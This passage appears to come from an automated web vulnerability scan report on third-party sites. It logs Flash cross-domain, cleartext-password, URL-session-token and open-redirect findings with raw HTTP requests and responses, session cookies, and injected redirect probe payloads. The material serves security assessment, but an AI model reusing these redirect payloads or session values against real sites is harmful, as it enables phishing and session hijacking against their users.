Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.afy11.net
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT Accept-Ranges: bytes ETag: "e732374a5649c71:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 28 Jan 2011 16:39:29 GMT Connection: close Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tt3.zedo.com
Response
HTTP/1.0 200 OK Server: ZEDO 3G Content-Length: 247 Content-Type: application/xml ETag: "24a6846-f7-44d91b52c0400" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=86400 Date: Sat, 29 Jan 2011 01:41:20 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]...
6. Cleartext submission of passwordpreviousnext There are 61 instances of this issue:
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:46 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-language: en Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 69819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
GET /track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:51 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 67934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
GET /users/login HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:31 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 30741
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://bostonherald.com/users/register/
The form contains the following password fields:
password
confirm_password
Request
GET /users/register/ HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:31 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 37175
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://support.moxiesoft.com/login.asp
The form contains the following password field:
txtPasswd
Request
GET / HTTP/1.1 Host: support.moxiesoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 14:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 25701 Content-Type: text/html Expires: Fri, 28 Jan 2011 14:10:59 GMT Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/ Cache-control: private
<!-- Function getOwnerIDforUser(sEmailId) Dim objUser Dim sSql Dim objADOConnection Dim sconnString Dim objOwnerId
Set objADOConnection = Server.CreateObject("ADODB.Connection")
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.paperg.com/
The form contains the following password field:
pass
Request
GET / HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 17:17:42 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny6 Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 10755
GET /forum/ HTTP/1.1 Host: www.parker-software.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 13:58:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET pragma: no-cache cache-control: private Content-Length: 21920 Content-Type: text/html Expires: Wed, 26 Jan 2011 13:58:10 GMT Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/ Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/ Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/ Cache-control: No-Store
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.screenthumbs.com/login
The form contains the following password field:
password
Request
GET /about HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.screenthumbs.com/login
The form contains the following password field:
password
Request
GET /contact HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.screenthumbs.com/login
The form contains the following password field:
password
Request
GET /forgot HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.screenthumbs.com/login
The form contains the following password field:
password
Request
GET /linkthumbs HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.screenthumbs.com/login
The form contains the following password field:
password
Request
GET /plugins HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.screenthumbs.com/login
The form contains the following password field:
password
Request
GET /service HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.screenthumbs.com/signup.php
The form contains the following password fields:
password
password2
Request
GET /signup.php HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://circle.stylemepretty.com/wp-login.php
The form contains the following password field:
pwd
Request
GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.stylemepretty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 15:06:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/ X-Pingback: http://www.stylemepretty.com/xmlrpc.php X-Mobilized-By: WordPress Mobile Pack 1.2.0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39718
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1 Host: base.liveperson.net Proxy-Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 28 Jan 2011 14:06:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924 Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 0
GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1 Host: base.liveperson.net Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 28 Jan 2011 14:06:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924 Set-Cookie: HumanClickCHATKEY=3761611791040242971; path=/hc/5296924; secure Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386 Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 0
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:05:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18 Content-Length: 390 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a> ...[SNIP]...
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:05:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18 Content-Length: 390 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a> ...[SNIP]...
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 16:59:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18 Content-Length: 390 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a> ...[SNIP]...
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 16:59:53 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18 Content-Length: 390 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a> ...[SNIP]...
GET /p-352ZWwG8I7OVQ HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sat, 29 Jan 2011 04:37:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <p> Maybe you should try <a href="/hulu.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">hulu.com</a>, <a href="/gawker.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">gawker.com</a> or <a href="/evite.com;jsessionid=14CB56AB65F99A643FDBA61F81B61593">evite.com</a> ...[SNIP]...
8. Password field submitted using GET methodpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://digg.com
Path:
/submit
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:
http://digg.com/submit
The form contains the following password field:
password
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//ab5c05f8be0257f29/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http%3a//ab5c05f8be0257f29/a%3fhttp%3a/t.mookie1.com/t/v1/clk HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 3 is used to perform an HTTP redirect. The payload http%3a//a15c68dbdb35dc3b6/a%3fhttp%3a was submitted in the REST URL parameter 3. This caused a redirection to the following URL:
